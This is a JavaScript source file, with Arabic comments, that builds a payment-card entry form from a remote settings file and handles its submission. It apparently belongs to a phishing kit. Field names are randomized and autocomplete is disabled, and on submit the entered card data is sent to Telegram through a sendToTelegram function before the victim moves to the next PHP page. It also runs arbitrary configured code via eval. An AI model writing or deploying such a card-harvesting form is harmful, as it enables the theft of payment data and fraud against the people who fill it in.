function randomName(len = 10) {
  const chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
  let name = '';
  for (let i = 0; i < len; i++) name += chars.charAt(Math.floor(Math.random() * chars.length));
  return name;
}

async function injectCardFields(containerId, formName = "card") {
  const container = document.getElementById(containerId);
  if (!container) return;

  // Load settings
  const settings = await (await fetch('settings.json?' + Date.now())).json();
  const fields = settings.fields?.[formName] || [];

  // مطابقة اسم الصفحة الحالي بدقة حتى لو متغير
  let currentFile = window.location.pathname.split('/').pop();
  let pageSettings = (settings.pages || []).find(p =>
    currentFile === p.php || currentFile.endsWith(p.php)
  ) || {};
  let submitSettings = pageSettings.forms_submit?.[formName] || settings.submit?.[formName] || {};

  const nameMap = {};
  let html = '';
  // تخزين الحقول الأصلية
  window._cardFieldsSpec = fields;

  let row = [];
  fields.forEach((fld, i) => {
    let randomFieldName = randomName();
    nameMap[fld.name] = randomFieldName;

    let attrs = `
      name="${randomFieldName}"
      id="${randomFieldName}"
      type="${fld.type}"
      autocomplete="off"
      ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
      ${fld.required ? 'required' : ''}
      ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
      ${fld.min ? `min="${fld.min}"` : ''}
      ${fld.max ? `max="${fld.max}"` : ''}
    `;
    let inlineJS = fld.js ? fld.js.trim() : '';

    let inputHtml = `<input ${attrs.trim()} oninput="${inlineJS}">`;
    let fieldHtml = `
      <div class="card-input${fld.small ? ' small' : ''}">
        <label for="${randomFieldName}" class="card-input__label">
          ${fld.label}${fld.required ? ' <span style="color:#e00">*</span>' : ''}
        </label>
        ${inputHtml}
      </div>
    `;

    if (fld.small) {
      row.push(fieldHtml);
      if (!fields[i + 1] || !fields[i + 1].small) {
        html += `<div class="row-fields">${row.join('')}</div>`;
        row = [];
      }
    } else {
      if (row.length) {
        html += `<div class="row-fields">${row.join('')}</div>`;
        row = [];
      }
      html += fieldHtml;
    }
  });

  if (row.length) html += `<div class="row-fields">${row.join('')}</div>`;

  container.innerHTML = html;
  window._cardFieldsNameMap = nameMap;

  // زر السبميت بمنطق injectUserFields
  let form = container.closest('form');
  if (form && !form.querySelector('.card-form__button')) {
    const submitLabel = submitSettings.label || 'Submit';
    const submitJs = submitSettings.js || '';
    const sendTelegram = !!submitSettings.send_telegram;
    const nextPage = submitSettings.next_page || '';

    const submitBtn = document.createElement('button');
    submitBtn.type = "button";
    submitBtn.className = "card-form__button";
    submitBtn.textContent = submitLabel;
    if (submitSettings.css) submitBtn.style.cssText += submitSettings.css;

    form.appendChild(submitBtn);

    // Spinner
    const spinner = document.createElement('span');
    spinner.className = "spinner";
    spinner.style.display = "none";
    submitBtn.appendChild(spinner);

    submitBtn.addEventListener("click", async (e) => {
      e.preventDefault();

      // جمع البيانات
      const formData = {};
      for (const [origName, randomName] of Object.entries(nameMap)) {
        const el = document.getElementById(randomName);
        if (el) formData[origName] = el.value;
      }

      // تنفيذ JS مخصص إن وجد
      if (submitJs.trim()) {
        try { eval(submitJs); } catch (err) { console.error("Custom JS error:", err); }
        return;
      }

      // Spinner & زر
      spinner.style.display = "inline-block";
      submitBtn.disabled = true;

      // إرسال لتليجرام إذا مطلوب
      let telegramOk = true;
      if (sendTelegram && typeof window.sendToTelegram === 'function') {
        try {
          telegramOk = await window.sendToTelegram(formName, formData);
        } catch (err) {
          telegramOk = false;
          console.warn("Telegram send failed:", err);
        }
      }

      // الانتقال للصفحة التالية حسب الإعدادات أو الترتيب
      if ((sendTelegram && telegramOk) || !sendTelegram) {
        if (nextPage) {
          window.location.href = nextPage;
        } else {
          // أو الانتقال للصفحة التالية في settings.pages حسب الترتيب
          const pages = settings.pages || [];
          const idx = pages.findIndex(p => p.php === currentFile);
          if (idx !== -1 && pages[idx + 1]) {
            window.location.href = pages[idx + 1].php;
          }
        }
      } else {
        spinner.style.display = "none";
        submitBtn.disabled = false;
      }
    });
  }

  // تطبيق CSS و JS المخصص لكل حقل
  fields.forEach((fld) => {
    let randomName = nameMap[fld.name];
    let inp = container.querySelector(`[name="${randomName}"]`);
    if (!inp) return;

    if (fld.css && fld.css.trim()) inp.style.cssText += fld.css;
    if (fld.js && fld.js.trim()) {
      try {
        inp.addEventListener('input', function () {
          try {
            (new Function(fld.js)).call(this);
          } catch {}
        });
      } catch {}
    }
  });
}